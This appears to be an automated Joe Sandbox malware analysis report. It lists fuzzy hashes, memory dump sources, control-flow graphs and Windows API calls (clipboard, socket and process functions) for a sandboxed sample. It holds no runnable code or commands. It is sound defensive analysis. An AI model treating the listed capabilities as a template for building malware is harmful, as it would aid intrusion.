                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ae0708ae5454aa953c525b16e2a3ddada624e4fd92bc6ed5fe5fef5895dc01c
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1328383B0FDC10BE7A9469C7CB52795F80EF9266570805FBE2D8C71DB9858EC0A9385
                                                                                                                                                                                                                                                                                                                          Function 00007FFD34894D0A Relevance: .8, Instructions: 796COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2489021120.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ffd34890000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2528bcc93a50c1f30dc2951d47f1a29338cc302d560d47ec1f806c7fb824f6d3
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3dbdf8e1c720575cbfab53ecf92436bb1de0ad4ec7402215f7b276c71fe3386a
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2528bcc93a50c1f30dc2951d47f1a29338cc302d560d47ec1f806c7fb824f6d3
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA229283B0FDC10BF7A9469C7CB52795F80EB9266570806FBE2D8C71DB5858EC0A9385

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 00007FFD348B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2594137597.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                                                                          • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41

                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                          Execution Coverage:0%
                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                          Signature Coverage:3.9%
                                                                                                                                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                          execution_graph 33911 42b640 45 API calls 33917 40de70 26 API calls 33832 424870 OpenClipboard GetClipboardData GetClipboardData GetClipboardData CloseClipboard 33920 417273 28 API calls 33921 420670 16 API calls 33924 4c9670 GetCurrentThreadId GetKeyboardLayout GetLocaleInfoA 33834 4dc870 EnterCriticalSection LeaveCriticalSection 33930 4275fe 16 API calls 33837 4d8000 EndDoc 33931 40d210 46 API calls 33841 4fc810 InitializeCriticalSection 33936 408220 14 API calls 33843 401031 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 33844 41d430 56 API calls 33945 4012c0 16 API calls 33948 40fad0 26 API calls 33847 4118d0 7 API calls 33849 4144de 34 API calls 33952 4086e0 19 API calls 33850 41d8e0 35 API calls 33851 4210e0 InterlockedCompareExchange Sleep InterlockedCompareExchange InterlockedExchange 33954 41bee8 19 API calls 33961 411a80 27 API calls 33962 40c290 QueryPerformanceCounter QueryPerformanceCounter 33862 427090 GetACP GetCPInfo 33864 401ca0 278 API calls 33965 40eaa0 28 API calls 33869 41b4b0 48 API calls 33968 41eab0 28 API calls 33974 4f9340 CoCreateInstance 33875 40d560 29 API calls 33977 417f61 29 API calls 33876 401170 12 API calls 33983 50af60 CoTaskMemAlloc 33821 4dc300 GetCommandLineA 33822 42c310 33821->33822 33881 40fd10 39 API calls 33818 44a710 33819 44a712 ExitProcess 33818->33819 33887 40d530 25 API calls 33995 41ef32 26 API calls 33888 40cdc0 17 API calls 34000 4ddfc0 64 API calls 34001 4263cc 18 API calls 33891 40d1d0 24 API calls 33893 41e5d0 GetSystemTime GetTimeZoneInformation 34002 42abd0 30 API calls 33897 41cde0 36 API calls 33900 412180 25 API calls 34009 4dd780 46 API calls 33903 428191 26 API calls

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 0044A710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 44a710-44a719 2 44a729 0->2 3 44a71b-44a727 0->3 4 44a73a-44a748 ExitProcess 2->4 3->4
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 621844428-399585960
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4153d7d145e48ef0bfada68ad49838f97c765877aadb4e058581a2a78d09dbec
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E04F75E4A25CCEEB30CA56EC017B8B775EB94316F0040EBD54D96241C6344D958F56
                                                                                                                                                                                                                                                                                                                          Function 0044A6E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 5 44a6e0-44a6fa 6 44a6fc-44a706 5->6 7 44a708 5->7 8 44a712-44a719 6->8 7->8 9 44a729 8->9 10 44a71b-44a727 8->10 11 44a73a-44a748 ExitProcess 9->11 10->11
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ceb8dd2f8bb3b7ec6cf47d3eabd97270618131fd29c238ba72ea5f4f3f95bef
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F01C7494622DCEEF308F61C8457ACB7B0BB04315F1082EAC46D67780C3348E829F86
                                                                                                                                                                                                                                                                                                                          Function 004DC300 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 12 4dc300-4dc310 GetCommandLineA call 42c310
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3253501508-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 324ae4de550c7ee1837b525cc46cc1c53208b04041f71095fcaff5b360da8b69
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51B012788003A00E83717B3834455CE7FF50C1D2E43844A58FCC1A3315D61488975AFA

                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                          Function 004D7960 Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 14 4d7960-4d796e 15 4d7977-4d797a 14->15 16 4d7970-4d7976 14->16 17 4d797c-4d7984 15->17 18 4d7985-4d7995 LoadLibraryA 15->18 19 4d7ad8-4d7aeb 18->19 20 4d799b-4d7aac GetProcAddress * 19 18->20 20->19 22 4d7aae-4d7ab5 20->22 23 4d7ab7-4d7ab9 22->23 24 4d7ad2 22->24 23->24 25 4d7abb-4d7ad1 23->25 24->19
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                                                                                                                                          • API String ID: 0-3677570488
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                                                                                                                                                                                          Function 004D9AB0 Relevance: 22.6, APIs: 15, Instructions: 136clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 689 4d9ab0-4d9ab7 690 4d9abd-4d9ac0 689->690 691 4d9c1c-4d9c1d 689->691 690->691 692 4d9ac6-4d9ad4 690->692 693 4d9ada-4d9aeb call 4b8000 692->693 694 4d9ba3-4d9ba5 692->694 699 4d9c19-4d9c1b 693->699 700 4d9af1-4d9b14 call 421380 GlobalAlloc 693->700 696 4d9ba8-4d9bad 694->696 696->696 698 4d9baf-4d9bc2 GlobalAlloc 696->698 698->699 701 4d9bc4-4d9bcb GlobalLock 698->701 699->691 706 4d9b2e-4d9b3f call 52b380 700->706 707 4d9b16-4d9b28 GlobalLock call 4b81c0 GlobalUnlock 700->707 703 4d9bd0-4d9bd8 701->703 703->703 705 4d9bda-4d9bdb GlobalUnlock 703->705 708 4d9be1-4d9be3 705->708 718 4d9b41-4d9b6b WideCharToMultiByte GlobalAlloc 706->718 719 4d9b90-4d9ba1 call 439d00 706->719 707->706 711 4d9be9-4d9bf3 OpenClipboard 708->711 712 4d9be5-4d9be7 708->712 711->699 713 4d9bf5-4d9c03 EmptyClipboard 711->713 712->699 712->711 716 4d9c0a-4d9c0c 713->716 717 4d9c05-4d9c08 SetClipboardData 713->717 720 4d9c0e-4d9c11 SetClipboardData 716->720 721 4d9c13 CloseClipboard 716->721 717->716 723 4d9b6d-4d9b70 GlobalLock 718->723 724 4d9b87-4d9b8d call 439d00 718->724 719->708 720->721 721->699 727 4d9b76-4d9b7e 723->727 724->719 727->727 728 4d9b80-4d9b81 GlobalUnlock 727->728 728->724
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3392129136-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                                          • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
